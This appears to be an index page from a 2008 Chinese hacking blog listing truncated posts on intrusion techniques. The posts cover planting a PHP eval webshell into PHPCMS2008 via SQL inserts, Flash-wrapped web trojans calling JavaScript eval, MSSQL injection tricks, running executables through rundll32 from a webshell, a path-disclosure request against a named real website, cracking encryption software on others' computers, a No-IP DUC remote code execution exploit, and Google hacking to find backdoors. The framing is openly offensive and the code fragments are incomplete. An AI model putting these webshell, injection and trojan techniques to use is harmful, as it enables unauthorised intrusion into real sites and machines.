popphen.net.ru
预览模式: 普通 | 列表

HOW TO GET PHPCMS2008 WEBSHELL

作者:天晴无名氏 日期:2008-11-27 10:34

http://www.pcsec.org/archives/how-to-get-phpcms2008-webshell.html

Posted by 小拳头

进去后

SQL代码
  1. Create TABLE b (cmd text NOT NULL);
SQL代码
  1. Insert INTO b (cmd) VALUES(‘<?php @eval($_PO

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 44

利用Flash封装网马

作者:天晴无名氏 日期:2008-11-27 10:33

使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var reque

[阅读全文]

标签: Flash 网马
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 55

28度的冰注入技巧之(一)——404页面妙用

作者:天晴无名氏 日期:2008-11-25 15:25

文章来源于 28度的冰 d72e27e1

遇到一个sa注入点,mssql错误提示关闭无疑是让人郁闷的事情。

虽然错误提示关闭也是可以列目录,执行命令,但是多少就有些不方便。阿D就可以在错误提示关闭的情况下列目录。

这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。

IIS,404页面的默认路径是 C:\Windows\Help\iisH

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 51

利用rundll32执行exe文件

作者:天晴无名氏 日期:2008-11-25 15:24

一个webshell,系统权限设置得很好,常用的exe都无权执行。可写目录传上去的exe文件,也没有执行权限。
最终发现设置权限的时候漏掉了rundll32.exe,如是就写了这个个代码。

测试开始的时候,PHP似乎没权执行命令。本来打算用php本身的一些溢出问题,溢出一个低权限的shell来的。后来意外发现使用proc_open函数可以执行一些内部命令,只是外部命令和目录都做了比较严格的权限设置

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 49

站长网dedecms爆目录方法

作者:天晴无名氏 日期:2008-11-25 15:20

站长网 dedecms爆目录方法
http://chinaz.com/include/htmledit/index.php?modetype=basic&height[]=airpig
Fatal error: Unsupported operand types in E:\2008.chinaz\include\htmledit

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 55

一些“加密”软件的破解方法

作者:天晴无名氏 日期:2008-11-25 15:18

现在网络上流行很多文件夹加密和文件加密的所谓加密软件,很多都是个人根据开源代码编写的程序,多数都是利用windows技巧实现的(最常见的就是将文件隐藏到回收站,万一你不小心删除了回收站或者重装了系统,那就只有哭了),最受不了的就是他们还都号称自己是什么“无敌”加密,下面就告诉大家几款加密软件的破解方法,非常简单,你可以用这个办法,去破解使用这类软件的电脑,说不定有意外收获哦

[阅读全文]

标签: 软件 破解
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 45

No-IP DUC <= 2.1.7 Remote Code Execution Exploit

作者:天晴无名氏 日期:2008-11-21 10:58

/*
     _  __                 __  ___     &nb

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 35

GET PHPCMS2008 WEBSHELL

作者:天晴无名氏 日期:2008-11-21 10:55

进去后
Create TABLE b (cmd text NOT NULL);           
Insert INTO b (cmd) VALUES('<?php&nbs

[阅读全文]

标签: PHPCMS WEBSHELL
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 50

Google Hack技术大演练精华总结

作者:天晴无名氏 日期:2008-10-15 17:43

作者:HackAkm
Google Hack技术大演练 Google Hack技术是现在最火暴的黑客技术之一.这项技术是撒网式攻击技术中是最好的方法.
  1.利用Google Hack技术进行信息的收集,查找网站后台以及网站的拓扑结果
  2.搜索别人留下来的后门(最直接,最省力的获取Webshell的方式) 踩点在入侵中起着决定性的作用,它占据了整个入侵过程中90%以上的时间. 收集信息一般主

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 87

结束进程和重新启动的vbs脚本

作者:天晴无名氏 日期:2008-10-12 13:29

http://mochong.cnisc.com/

按照提示存为t.vbs文件,在cmd窗口中输入cscript t.vbs [参数]就可以了。
如果想移植到vb下,把wscript.echo替换成debug.pring或者其他的输出函数就可以了

'function: 
' list all process or&

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 79